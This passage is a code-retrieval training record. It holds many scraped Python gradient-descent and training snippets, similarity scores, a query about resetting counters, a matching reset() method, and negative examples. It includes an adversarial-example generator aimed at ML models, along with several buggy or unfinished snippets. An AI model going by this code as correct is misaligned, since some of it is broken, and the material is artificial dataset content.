iter number and rss\n if initial_weights is None:\n weights = self.initial_weight\n else:\n weights = initial_weights\n # Compute indicator value for (y_i = +1)\n indicators = np.array([int (i) for i in (self.train_output_y==1)])\n for itr in range(n_iters):\n # Predict P(y_i = +1|x_1,w) using your predict_probability() function\n _, pred_probs = self.predict_probability(self.train_feature_x, weights)\n \n # Compute the errors as indicator - predictions\n errors = indicators - pred_probs\n\n #Update the weights:\n derivative = self.feature_derivative(errors, weights, l2)\n weights = weights + derivative * (step_size) \n \n #check if converged\n #todo\n \"\"\"\n # Checking whether log likelihood is increasing\n if itr <= 15 or (itr <= 100 and itr % 10 == 0) or (itr <= 1000 and itr % 100 == 0) \\\n or (itr <= 10000 and itr % 1000 == 0) or itr % 10000 == 0:\n lp = self.compute_log_likelihood(indicators,weights)\n print 'iteration %*d: log likelihood of observed labels = %.8f' % \\\n (int(np.ceil(np.log10(n_iters))), itr, lp)\n \"\"\"\n \n #check weights\n #print \"\\n\"\n #print \"The weights for features: \", weights\n #final prediction\n preds = self.prediction(x, weights)\n return preds, weights", "def curves_gradient_descent(theta, m_, learning_rate=0.001, iterations=1000):\n for i in range(iterations):\n theta = theta - learning_rate * curves_gradient(theta, m_)\n return theta", "def stochasticGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n 
lastCost = cost\n hypothesis = np.dot(x,theta) \n for i in range(m):\n # alpha = 4.0 / (1.0 + i) + 0.01 \n loss = hypothesis[i] - y[i]\n # gradient = np.dot(x[i],loss)\n gradient = x[i,:].transpose() * loss \n theta = theta - alpha * gradient\n cost = np.sum((hypothesis-y)**2)/(2*m)\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(objective_function, derivative, boundaries, iterations, step_size):\n # create lists to track all outputs\n outputs = list()\n scores = list()\n # get a random point within the boundaries\n output = boundaries[:, 0] + rand(len(boundaries)) * (\n boundaries[:, 1] - boundaries[:, 0]\n )\n # for each iteration in the iter object\n for i in range(iterations):\n # calculate gradient\n gradient = derivitive(output) # Code breaks here -\n # take a step\n output = output - step_size * gradient\n # evaluate candidate point\n output_eval = objective_function(output)\n # store output\n outputs.append(output)\n scores.append(output_eval)\n # report progress\n print(output, output_eval)\n return [outputs, scores]", "def train(self, X, y, learning_rate=1e-3, reg=1e-5, num_iters=100,\n batch_size=200, verbose=False):\n num_train, dim = X.shape\n num_classes = np.max(y) + 1 # assume y takes values 0...K-1 where K is number of classes\n if self.W is None:\n # lazily initialize W\n self.W = 0.001 * np.random.randn(dim, num_classes)\n\n # Run stochastic gradient descent to optimize W\n loss_history = []\n for it in range(num_iters):\n X_batch = None\n y_batch = None\n\n #########################################################################\n # TODO: #\n # Sample batch_size elements from the training data and their #\n # corresponding labels to use in this round of gradient descent. #\n # Store the data in X_batch and their corresponding labels in #\n # y_batch; after sampling X_batch should have shape (batch_size, dim) #\n # and y_batch should have shape (batch_size,) #\n # #\n # Hint: Use np.random.choice to generate indices. Sampling with #\n # replacement is faster than sampling without replacement. #\n #########################################################################\n choices = np.random.choice(num_train, batch_size)\n X_batch = X[choices]\n y_batch = y[choices]\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n # evaluate loss and gradient\n loss, grad = self.loss(X_batch, y_batch, reg)\n loss_history.append(loss)\n\n # perform parameter update\n #########################################################################\n # TODO: #\n # Update the weights using the gradient and the learning rate. 
#\n #########################################################################\n self.W -= learning_rate * grad\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n if verbose and it % 100 == 0:\n print('iteration %d / %d: loss %f' % (it, num_iters, loss))\n\n return loss_history", "def exp_grad(self, xs, *args, **kwargs):\n raise NotImplementedError", "def projected_gradient_descent(self, x, y):\n x_adv = x.clone().detach().requires_grad_(True).to(x.device)\n targeted = self.y_target is not None\n num_channels = x.shape[1]\n\n if self.random:\n x_adv = random_perturbation(x_adv, self.norm, self.eps)\n\n for i in range(self.num_steps):\n _x_adv = x_adv.clone().detach().requires_grad_(True)\n\n prediction = self.model(_x_adv)\n loss = self.loss_fn(prediction, self.y_target if targeted else y)\n loss.backward()\n\n with torch.no_grad():\n # Force the gradient step to be a fixed size in a certain norm\n if self.norm == 'inf':\n gradients = _x_adv.grad.sign() * self.step_size\n else:\n # Note .view() assumes batched image data as 4D tensor\n gradients = _x_adv.grad * self.step_size / _x_adv.grad.view(\n _x_adv.shape[0], -1) \\\n .norm(self.norm, dim=-1) \\\n .view(-1, num_channels, 1, 1)\n\n if targeted:\n # Targeted: Gradient descent with on the loss of the (incorrect) target label\n # w.r.t. the image data\n x_adv -= gradients\n else:\n # Untargeted: Gradient ascent on the loss of the correct label w.r.t.\n # the model parameters\n x_adv += gradients\n\n # Project back into l_norm ball and correct range\n if self.norm == 'inf':\n # Workaround as PyTorch doesn't have elementwise clip\n x_adv = torch.max(torch.min(x_adv, x + self.eps), x - self.eps)\n else:\n delta = x_adv - x\n\n # Assume x and x_adv are batched tensors where the first dimension is\n # a batch dimension\n mask = delta.view(delta.shape[0], -1).norm(self.norm,\n dim=1) <= self.eps\n\n scaling_factor = delta.view(delta.shape[0], -1).norm(self.norm,\n dim=1)\n scaling_factor[mask] = self.eps\n\n # .view() assumes batched images as a 4D Tensor\n delta *= self.eps / scaling_factor.view(-1, 1, 1, 1)\n\n x_adv = x + delta\n\n x_adv = x_adv.clamp(*self.clamp)\n\n return x_adv.detach()", "def lr_cost_function_grad(theta: np.ndarray, X: np.ndarray, y: np.ndarray, l: float) -> np.ndarray:\n # Initialize some useful values\n m = len(y) # number of training examples\n\n # You need to return the following variable correctly.\n grad = np.zeros(theta.shape)\n\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the partial derivatives and set grad to the partial\n # derivatives of the cost w.r.t. 
each parameter in theta.\n\n # =============================================================\n return grad", "def GradientDescent(x, y, theta, alpha, tolerate, maxiterate, epsilon):\n i = 0 # set the iteration counting index\n tolerate_rule = 1 # set the initial tolerate rate\n n = x.shape[0]\n current_theta = theta\n scost_vector = np.empty([0, 1])\n lcost_vector = np.empty([0, 1])\n hcost_vector = np.empty([0, 1])\n\n # iterate\n while tolerate_rule >= tolerate and i <= maxiterate:\n sl = np.array(SquareLoss(x, y, current_theta)).reshape([1, 1])\n scost_vector = np.append(scost_vector, sl, axis=0) # store cost\n abs = np.array(AbsoluteLoss(x, y, current_theta)).reshape([1, 1])\n lcost_vector = np.append(lcost_vector, abs, axis=0) # store cost\n hbs = np.array(HuberLoss(x, y, current_theta, epsilon)).reshape([1, 1])\n hcost_vector = np.append(hcost_vector, hbs, axis=0) # store cost\n fx = x @ current_theta\n update_theta = current_theta - alpha * (1/n) * x.transpose() @ (fx - y)\n tolerate_rule = np.minimum(np.abs(update_theta - current_theta))\n i += 1\n current_theta = update_theta\n\n cost_matrix = np.asmatrix(np.stack((scost_vector, lcost_vector,\n hcost_vector),\n axis=-1))\n cost_dataframe = pd.DataFrame(cost_matrix, columns=['AbsoluteLoss',\n 'SquareLoss',\n 'HuberLoss'])\n return(current_theta, cost_dataframe)", "def fit(self, X, y):\n\n n, m = X.shape[0], X.shape[1]\n\n # theta is (nx1) (one theta per dimension)\n self.theta = np.random.uniform(-10, 10, (n, 1))\n\n for i in range(self.epochs):\n # Get predictions\n y_pred = self.predict(X)\n\n # calculate cost\n # cost = ...\n cost = self._cost_function(y_pred, y, m)\n \n\n # gradient is an (n) x 1 array, it refers to the derivate per theta\n gradient = self._cost_function_derivative(y_pred, y, X, m)\n\n # delta/update rule\n self.theta = gradient\n\n self.costs.append(cost)\n pass\n\n print(\"Final theta is {} (cost: {})\".format(self.theta.T, cost))", "def trainLogRegres(train_x, train_y, opts):\n startTime = time.time() # calculate training time\n\n numSamples, numFeatures = np.shape(train_x)\n alpha = opts['alpha']\n maxIter = opts['maxIter']\n weights = np.ones((numFeatures, 1))\n\n for k in range(maxIter):\n if opts['optimizeType'] == 'stocGradDescent': # stochastic gradient descent\n for i in range(numSamples):\n output = sigmoid(train_x[i, :] * weights)\n loss = train_y[i, 0] - output\n weights = weights + alpha * train_x[i, :].transpose() * loss\n elif opts[\n 'optimizeType'] == 'smoothStocGradDescent': # smooth stochastic gradient descent. randomly select samples to optimize for reducing cycle fluctuations.\n dataIndex = list(range(numSamples))\n for i in range(numSamples):\n alpha = 4.0 / (1.0 + k + i) + 0.01\n randIndex = int(np.random.uniform(0, len(dataIndex)))\n output = sigmoid(train_x[randIndex, :] * weights)\n loss = train_y[randIndex, 0] - output\n weights = weights + alpha * train_x[randIndex, :].transpose() * loss\n del (dataIndex[randIndex])\n print('Congratulations, training complete! Took %fs!' 
% (time.time() - startTime))\n return weights", "def gradient_function(X, t, flow, species_list):\n vals = {\"t\": t}\n\n for i, species in enumerate(species_list):\n vals[species] = X[i]\n\n result = []\n\n for species in flow:\n result.append(flow[species].evalf(subs=vals))\n\n return result", "def gradient_descent(self, X, theta, Y, m):\n\n Z = X.dot(theta)\n H = Predict.g(Z)\n gradient = np.dot(X.T, (H - Y)) / m\n return self.alpha * gradient", "def get_batch_grad(f, inputs):\n nsamples = inputs.shape[0]\n grads = torch.zeros_like(inputs)\n input_values = inputs.detach().numpy()\n for i in range(nsamples):\n x = torch.tensor(input_values[[i]], requires_grad=True)\n y = f(x)\n y.backward()\n grads[i] = x.grad\n return grads", "def RatingsGradientDescent(params, Y, R, num_users, num_movies, num_features, lbd, alpha, num_iters):\n J_history = np.zeros(num_iters)\n for i in range(num_iters):\n J_history[i], grad = cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd)\n params = params-alpha*grad\n if i % 100 == 99:\n print('Step %i, cost=%f' % (i+1, J_history[i]))\n return params, J_history", "def gradientFunctionReg(theta, X, y, Lambda): \n y = np.squeeze(y)\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad[1:] = grad[1:] + Lambda*theta[1:]\n grad /= m\n\n return grad", "def train(self, X, y, learning_rate=1e-3, num_iters=100,\n batch_size=200, verbose=False):\n num_train, dim = X.shape\n num_classes = np.max(y) + 1 # assume y takes values 0...K-1 where K is number of classes\n\n self.init_weights(dims=[np.max(y) + 1, X.shape[1]])\t# initializes the weights of self.W\n\n # Run stochastic gradient descent to optimize W\n loss_history = []\n\n for it in np.arange(num_iters):\n X_batch = None\n y_batch = None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Sample batch_size elements from the training data for use in \n # gradient descent. After sampling,\n # - X_batch should have shape: (dim, batch_size)\n # - y_batch should have shape: (batch_size,)\n # The indices should be randomly generated to reduce correlations\n # in the dataset. Use np.random.choice. 
It's okay to sample with\n # replacement.\n # ================================================================ #\n mask = np.random.choice(num_train, batch_size, replace=True)\n \n X_batch = X[mask] # (dim, batch_size)\n y_batch = y[mask] # (batch_size,)\n \n pass\n \n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n # evaluate loss and gradient\n loss, grad = self.fast_loss_and_grad(X_batch, y_batch)\n loss_history.append(loss)\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Update the parameters, self.W, with a gradient step \n # ================================================================ #\n pass\n \n self.W = self.W - learning_rate*grad\n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n if verbose and it % 100 == 0:\n print('iteration {} / {}: loss {}'.format(it, num_iters, loss))\n\n return loss_history", "def train(self, X, Y, num_iterations = 1000, learning_rate = 0.01, print_cost = False, plot_cost = False):\n costs = []\n \n for i in range(num_iterations + 1):\n grads, cost = self.propagate(X,Y)\n \n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n # Update rule\n self.weight = self.weight - learning_rate * dw\n self.bias = self.bias - learning_rate * db\n \n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n \n # Print the cost every 100 training examples\n if print_cost and i % 100 == 0:\n print(f\"cost after iteration: {i} is {np.round(cost, 4)}\")\n \n grads = {\"dw\": dw,\n \"db\": db}\n\n if plot_cost:\n plt.plot(np.arange(len(costs)) * 100, costs)\n plt.xlabel(\"epoch\")\n plt.ylabel(\"cost\")\n plt.title(f\"Logistic curve fitting loss function (learning rate={learning_rate})\")\n plt.show()\n \n return grads, costs", "def gradient(theta, X, y, learning_rate):\n m = len(y)\n\n theta = theta.reshape((-1,1))\n grad = np.zeros(theta.shape)\n h = sigmoid(np.dot(X, theta)) \n \n grad = np.dot((h-y).T, X)/m\n grad = grad.T\n grad[1:] += (learning_rate/m)*theta[1:]\n return grad", "def _apply_gradient_descent(self, gradients):\n updated_sd = {}\n global_model = self._get_global_model()\n \n for name, param, grad in zip(global_model.keys(), global_model.values(), gradients):\n updated_sd[name] = param - self.global_lr * grad\n \n self._load_global_model(updated_sd)", "def train(self, inputs, targets, batch_size=10, learning_rate=0.1):\n\n # Shuffle indices for random batches.\n indices = list(range(len(inputs)))\n random.shuffle(indices)\n batches = [\n indices[i : i + batch_size] for i in range(0, len(indices), batch_size)\n ]\n\n for batch in batches:\n # Average partial derivatives for the batch.\n ws_d = [np.zeros(w.shape) for w in self.ws]\n bs_d = [np.zeros(b.shape) for b in self.bs]\n for i in batch:\n ws_dd, bs_dd = self.backprop(inputs[i], targets[i])\n for i in range(1, len(self.ws)):\n ws_d[i] += ws_dd[i]\n bs_d[i] += bs_dd[i]\n\n # Update weights and biases based on partial derivatives.\n for i in range(1, len(self.ws)):\n self.ws[i] -= learning_rate * ws_d[i] / len(batch)\n self.bs[i] -= learning_rate * bs_d[i] / len(batch)", "def train(self, X, y, learning_rate=1e-3, num_iters=100,\n batch_size=200, verbose=True):\n num_train, dim = X.shape\n\n if self.w is None:\n self.w = 0.001 * np.random.randn(dim)\n\n loss_history = []\n\n # 
将feature与label连起来,方便后面batch的划分\n all_data = list(zip(X, y))\n\n for it in xrange(num_iters):\n X_batch = None\n y_batch = None\n\n #########################################################################\n # TODO: #\n # Sample batch_size elements from the training data and their #\n # corresponding labels to use in this round of gradient descent. #\n # Store the data in X_batch and their corresponding labels in #\n # y_batch; after sampling X_batch should have shape (batch_size, dim) #\n # and y_batch should have shape (batch_size,) #\n # #\n # Hint: Use np.random.choice to generate indices. Sampling with #\n # replacement is faster than sampling without replacement. #\n #########################################################################\n\n # batch_data = np.random.choice(all_data, batch_size, False) \n # error: ValueError: a must be 1-dimensional \n # 查询相关api貌似该方法不能用于数组中元素为元组情况下的选取\n batch_data = random.sample(all_data, batch_size)\n X_batch, y_batch = zip(*batch_data)\n X_batch = np.array(X_batch)\n y_batch = np.array(y_batch)\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n # evaluate loss and gradient\n\n loss, grad = self.loss(X_batch, y_batch)\n loss_history.append(loss)\n\n # perform parameter update\n #########################################################################\n # TODO: #\n # Update the weights using the gradient and the learning rate. #\n #########################################################################\n self.w += float(learning_rate) * np.array(grad)\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n if verbose and (it % 1000 == 0 or it == num_iters - 1):\n print('iteration %d / %d: loss %f' % (it, num_iters, loss))\n\n return loss_history", "def learn(self, Xtrain, ytrain):\n self.cost_data = []\n self.weights = np.zeros((len(self.params['features']), 1))\n numsamples = Xtrain.shape[0]\n Xless = Xtrain[:,self.params['features']]\n y = ytrain[:, np.newaxis]\n\n cur_cost = float(\"inf\")\n tolerance = 10 ** -6\n new_cost = self.cost(self.weights, Xless, y, self.params['regwgt'], numsamples)\n while abs(new_cost - cur_cost) > tolerance:\n cur_cost = new_cost\n gradient = np.dot(np.transpose(Xless), np.subtract(np.dot(Xless, self.weights), y)) / numsamples #+ (2 * self.params['regwgt'] * self.weights)\n step_size = self.line_search(self.weights, new_cost, gradient, Xless, y, self.params['regwgt'], numsamples)\n self.weights = self.weights - (step_size * gradient)\n new_cost = self.cost(self.weights, Xless, y, self.params['regwgt'], numsamples)\n\n #Format properly for the error function\n self.weights = np.ndarray.flatten(self.weights)", "def train(self, X_train, y_train, batch_size, num_epochs, alpha=0.8):\r\n batch_split = tf.data.Dataset.from_tensor_slices((X_train, y_train))\r\n batch_split = batch_split.batch(batch_size)\r\n for epoch in range(num_epochs):\r\n for step, (i,j) in enumerate(batch_split):\r\n with tf.GradientTape() as tape:\r\n predictions = self.predict(i)\r\n loss = self.calculate_loss(j, predictions)\r\n dloss_dw, dloss_db = tape.gradient(loss, [self.weights, self.biases])\r\n for k in range(len(self.weights)):\r\n self.weights[k].assign_sub(alpha * dloss_dw[k])\r\n self.biases[k].assign_sub(alpha * dloss_db[k])", "def gradient_ascent_step(func, inputs, step_size):\n raise 
NotImplementedError", "def test_multiclass_gradient_descent_blobs():\n from your_code import MultiClassGradientDescent\n\n np.random.seed(0)\n\n features, _, targets, _ = load_data('blobs')\n\n learner = MultiClassGradientDescent(loss='squared', regularization=None,\n learning_rate=0.01, reg_param=0.05)\n learner.fit(features, targets, batch_size=None, max_iter=1000)\n predictions = learner.predict(features)\n\n print(\"predictions: \", predictions)\n print(\"targets: \", targets)", "def compute_gradient(self, function, arguments):", "def loss(self, X, y=None, reg=0.0):\r\n Ws = self.weights\r\n bs = self.biases\r\n N, D = X.shape # number of samples, number of features per sample\r\n\r\n # Compute the forward pass\r\n self.activations = []\r\n for i in xrange(len(Ws)): # for each set of weights\r\n W,b = Ws[i], bs[i]\r\n if i == 0:\r\n H = np.dot(X,W) + b\r\n else:\r\n H = np.dot(self.activations[-1],W) + b\r\n if i < len(Ws) - 1: # if we're computing hidden activations, apply nonlinear function\r\n H = (H > 0) * (H) + (H < 0) * (H/100.0)\r\n self.activations.append(H)\r\n scores = self.activations[-1]\r\n \r\n # If there's no labels provided, stop here\r\n if y is None:\r\n return scores\r\n\r\n # Compute the loss\r\n exped_scores = np.exp(scores)\r\n sums = np.sum(exped_scores,axis=1)\r\n # softmax classifier loss\r\n data_loss = (-1.0/N) * np.sum(np.log(exped_scores[range(N),y.astype(int)] / sums))\r\n\r\n # loss due to regularization\r\n reg_loss = 0\r\n for i in xrange(len(Ws)):\r\n reg_loss += np.sum(Ws[i]**2)\r\n reg_loss *= reg*(0.5)\r\n\r\n loss = data_loss + reg_loss\r\n \r\n # Compute gradients\r\n weights_grads = []\r\n biases_grads = []\r\n activation_grads = []\r\n for i in xrange(len(Ws)):\r\n weights_grads.append(np.copy(Ws[i]))\r\n biases_grads.append(np.copy(bs[i]))\r\n activation_grads.append(np.copy(self.activations[i]))\r\n\r\n DlossDscores = np.array(exped_scores / (N * np.matrix(sums).T))\r\n DlossDscores[range(N),y.astype(int)] -= (1.0/N)\r\n \r\n for i in xrange(len(Ws)-1,-1,-1):\r\n if i == 0:\r\n weights_grads[0] = np.dot(X.T, activation_grads[0]) + reg*Ws[0]\r\n biases_grads[0] = np.dot(np.ones((1,N)), activation_grads[0])[0]\r\n elif i == len(Ws)-1:\r\n H = self.activations[i-1]\r\n weights_grads[i] = np.dot(H.T, DlossDscores) + reg*Ws[i]\r\n biases_grads[i] = np.dot(np.ones((1,N)), DlossDscores)[0]\r\n dH = np.dot(DlossDscores, Ws[i].T)\r\n activation_grads[i-1] = dH\r\n else:\r\n H = self.activations[i-1]\r\n dH_out = activation_grads[i]\r\n weights_grads[i] = np.dot(H.T, dH_out) + reg*Ws[i]\r\n biases_grads[i] = np.dot(np.ones((1,N)), dH_out)[0]\r\n dH = np.dot(dH_out, Ws[i].T)\r\n dH = dH * (H > 0) + dH/100.0 * (H < 0)\r\n activation_grads[i-1] = dH\r\n \r\n grads = {}\r\n grads['weights'] = weights_grads\r\n grads['biases'] = biases_grads\r\n\r\n return loss, grads", "def simple_train(self, data_set, learning_rate=0.01, steps=100):\n for _ in range(steps):\n for feature, label in data_set:\n utop = self.network.forward(*[Unit(k) for k in feature])\n if label > 0 and utop.value < 1:\n pull = 1\n elif label < 0 and utop.value > -1:\n pull = -1\n else:\n pull = 0\n # Set the gradient of final unit and then backward to get the direction (gradient) of corresponding parameters\n # We can also set the pull (i.e. 
gradient) more/less than 1 to make the adjust more efficient\n self.network.set_utop_gradient(pull)\n self.network.backward()\n self.network.pull_weights(learning_rate)", "def train_step(model, features, labels):\n with tf.GradientTape() as tape:\n predictions = model(features, training=True)\n loss = loss_func(labels, predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss.update_state(loss)\n train_metric.update_state(labels, predictions)", "def run_gradient_descent(seed=0):\n random.seed(seed)\n colors = [color for color in matplotlib.colors.cnames]\n\n def random_point():\n return (2 * random.random() - 1, 2 * random.random() - 1)\n\n def df(x_i):\n \"\"\"this is the gradient of x^2 + y^2\"\"\"\n return [2 * x_ij for x_ij in x_i]\n\n for color in random.sample(colors, 50):\n path = take(10, gradient_descent(df, random_point()))\n for i, (x, y) in enumerate(path):\n plt.plot(x, y, color=color, marker='*', markersize=20-2*i)\n\n plt.show()", "def gradient_ascent(self, w, X, y, lr):\r\n # INSERT YOUR CODE HERE\r\n #raise Exception('Function not yet implemented!')\r\n # gradient = x_j*(y-σ(wTX))\r\n return np.dot(X.T, y-self.sigmoid(np.dot(X, w)))", "def train(features, targets, weights, bias):\n # see gradient_descent for explanation\n epochs = 100\n learning_rate = 0.1\n\n picture_nb = 2\n\n # Print current accuracy. How many people have been classified as sick/healthy correctly?\n predictions = predict(features, weights, bias)\n print(\"Accuracy: \", np.mean(predictions == targets))\n\n for epoch in range(epochs):\n if epoch % 10 == 0:\n # get normalized scores\n predictions = activation(pre_activation(features, weights, bias))\n # compare with targets to see how bad our algorithm is\n print(\"Cost = %s\" % cost(predictions, targets))\n # Replot graph. Check in create_dataset for explanation of parameters\n if picture_nb == 2:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='red')\n elif picture_nb == 11:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='green')\n else:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='orange')\n picture_nb+=1\n\n # Initialize gradients\n # weights_gradients is 2D array with 2 values\n weights_gradients = np.zeros(weights.shape)\n bias_gradient = 0\n # Go through each row\n for feature, target in zip(features, targets):\n # Compute prediction\n z = pre_activation(feature, weights, bias)\n # Get normalized score\n y = activation(z)\n # Update gradients based on formulas established before. Look at gradient_descent to understand what we\n # are doing. Also, the formulas are below, just before the call of the function train.\n weights_gradients += (y - target) * derivative_activation(z) * feature\n # no multiplication of feature because it does not depend on some coordinates.\n bias_gradient += (y - target) * derivative_activation(z)\n\n # Update variables. These are the lines that result the cost to get reduced.\n weights = weights - learning_rate * weights_gradients\n bias = bias - learning_rate * bias_gradient\n\n # Print final accuracy. 
How many people have been classified as sick/healthy correctly?\n predictions = predict(features, weights, bias)\n print(\"Accuracy: \", np.mean(predictions == targets))\n\n plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)\n plt.savefig(\"DataPointsLineEvolution.png\")\n # legend for understanding\n plt.legend(['Original division', 'New division', 'New division', 'New division', 'New division', 'New division',\n 'New division', 'New division', 'New division', 'Final division'], loc='upper left')\n # save picture of data points drawn.\n plt.savefig(\"DataPointsLineEvolutionLegend.png\")", "def _learn_using_SGD(self, y, tx, w, batch_size, fn, gamma, lambda_, regularization):\n for y_batch, tx_batch in batch_iter(y, tx, batch_size=batch_size, num_batches=1):\n loss, grad = fn(y_batch, tx_batch, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def _evaluate_gradient(self, **variables):\n pass", "def optimize_sgd(beta, X, y, num_iterations, step_size):\n \n N = X.shape[0]\n P = X.shape[1]\n costs = []\n #variable step size\n if step_size == 'rm': #Robbins–Monro rule\n t0 = 2\n C = 1\n alpha = 0.5\n for i in range(num_iterations): \n j = random.randint(0,N-1) #Randomly sample a datapoint with replacement\n \n # Here I only pick a slice of X and an entry of y\n # To reuse our codes for standard GD, \n dbeta, cost = propagate(beta, X[j,:].reshape(1,P), y[j,:].reshape(1,1)) \n \n beta -= dbeta * C * ((num_iterations + t0)**(-alpha)) \n \n if i%1000 == 0:\n _, cost = propagate(beta, X, y) \n costs.append(cost.flatten())\n \n else: # constant step size\n step_size = float(step_size)\n for i in range(num_iterations):\n j = random.randint(0,N-1) #Randomly sample a datapoint with replacement\n \n # Here I only pick a slice of X and an entry of y\n # To reuse our codes for standard GD, \n dbeta, cost = propagate(beta, X[j,:].reshape(1,P), y[j,:].reshape(1,1)) \n \n beta -= dbeta * step_size\n \n if i%1000 == 0:\n _, cost = propagate(beta, X, y) \n costs.append(cost.flatten())\n \n \n return beta, costs" ]
[ "0.7502321", "0.73805606", "0.72277737", "0.7210376", "0.71823865", "0.7039117", "0.6943254", "0.69380903", "0.6851058", "0.68016803", "0.66611814", "0.6622531", "0.6600367", "0.65702754", "0.656558", "0.655788", "0.65387475", "0.6533046", "0.6499761", "0.64804655", "0.6431845", "0.6398041", "0.6384216", "0.63816094", "0.63598675", "0.6336628", "0.6311704", "0.6264924", "0.62526715", "0.62387305", "0.6229099", "0.6216951", "0.62019753", "0.6192185", "0.61877626", "0.6176001", "0.6157371", "0.6146289", "0.6140622", "0.6135851", "0.612861", "0.61265534", "0.6122873", "0.6113275", "0.61084163", "0.61080873", "0.6071068", "0.60692817", "0.6054154", "0.6043185", "0.6041766", "0.6032926", "0.60323936", "0.6030732", "0.6020072", "0.60181767", "0.6014405", "0.6006019", "0.6001698", "0.599236", "0.5992058", "0.59814686", "0.59733915", "0.59594053", "0.59251696", "0.5920807", "0.5919988", "0.59127814", "0.58935857", "0.5883601", "0.58814955", "0.58765346", "0.5863652", "0.58634937", "0.5862332", "0.58604026", "0.5856421", "0.58503634", "0.58465004", "0.58317435", "0.58291805", "0.58280957", "0.5821844", "0.5816761", "0.5806616", "0.5804511", "0.58039457", "0.58034915", "0.5802762", "0.5800673", "0.57844096", "0.5763415", "0.5759988", "0.575535", "0.57490426", "0.57488096", "0.5724345", "0.57205623", "0.5719029", "0.5701306" ]
0.7124435
5
Reset all counters and the greedy parameter
def reset(self):
        self.c_count = 0
        self.a_count = -1
        self.epsilon = self.init_epsilon
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def reset (self):\n self.counter = 0", "def reset(self):\n self.counter = 0", "def reset(self):\n self.algo_state = {}\n self.actual_repetitions = 0\n self.next_session = -1\n self.last_session = -1\n self.past_quality = []", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.test = 0\n self.hit = 0", "def reset(self):\n self.patterns = []\n self.number = -1", "def reset_counter(self) -> None:", "def reset():", "def reset():", "def reset():", "def reset_counter(self):\n self.counter = 0\n self.highlight_input()", "def reset_count(self):\n self.count = 0", "def reset(self):\n self.correct_count = 0\n self.total_count = 0", "def reset_search(self):\n self._state = IdleTracker._INITIAL_STATE\n self._scan_count = 0\n self._candidate_list = None", "def reset(*args):", "def reset(*args):", "def reset(*args):", "def reset(self):\n self.test = 0\n self.pos = 0", "def reset(self):\n self.test = 0\n self.pos = 0", "def reset(self):\n # reset Regions and counter\n for name in self.group.keys():\n self.group[name].reset()\n self.counter[name] = 0\n\n # reset to initial outbreak\n if name in self.initial_outbreak.keys():\n self.group[name].set_infected()\n self.counter[name] = self.initial_outbreak[name]\n\n if self.rng is not None:\n np.random.seed(self.rng)\n\n self.iter = 0\n self.end = False\n return", "def reset(self) -> None:\n self.current = 0\n self.num_cuts = 0", "def reset(self):\n self.total_pulls = 0\n self.total_score = 0\n self.npulls = np.zeros(self.k)\n self.score = np.zeros(self.k)", "def Reset(self):\n self._results = []", "def _reset_count(self):\n self._triple_count = 0\n self._error_count = 0\n self._ignored_count = 0", "def reset_stats(self):\r\n self.pepes_left = self.ai_settings.pepe_limit\r\n self.score = 0\r\n self.level = 1", "def reset():\r\n pass", "def reset(self):\n self.tot = 0\n self.cnt = [0.0 for _ in range( self.alpha.getLen() )]", "def reset(self):\n self.tracker.reset()\n self.total_max_q = 0.0\n self.episode_step = 0\n self.episode += 1", "def reset(self) -> None:\n self.best = self.mode_worse\n self.cooldown_counter = 0\n self.num_bad_epochs = 0", "def reset():\n\n global optimizer_data\n global optimizer_len\n\n optimizer_data = []\n optimizer_len = 0\n return", "def reset(self):\n self.avg = 0\n self.sum = 0\n self.cnt = 0", "def reset(self) -> None:\n self.true_positives = 0\n self.all_positives = 0", "def reset():\n pass", "def reset():\n pass", "def reset(self):\n self.loss = 0\n self.cnt = 0", "def reset(self):\n self.accumulation = None", "def reset(self):\n self.accumulation = None", "def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0", "def reset():\n global counter, total_attempts, successful_stops\n timer.stop()\n counter = 0\n total_attempts = 0\n successful_stops = 0", "def reset():\n global current, tries, wins\n current = 0\n tries = 0\n wins = 0\n timer.stop()", "def reset(self):\n self.damage_dealt = 0\n self.kills = 0\n self.got_killed = False\n self.fitness = 0", "def reset(self):\n self.liidx = 0\n self.clidx = 0", "def resetBot(self):\n self.state = [None, None, None, False]\n self.score = 0\n counts = {}\n for value in dnUtil.valuesList:\n counts[value] = self.calcDefaultCount(value)\n self.state[2] = counts", "def reset(self):\n for i in range(0, len(self.__counts)):\n self.__counts[i] = 0\n self.__overflow = 0\n self.__total_count = 0\n self.__total_values = 0\n self.__min = None\n self.__max = None", "def reset(self):", "def 
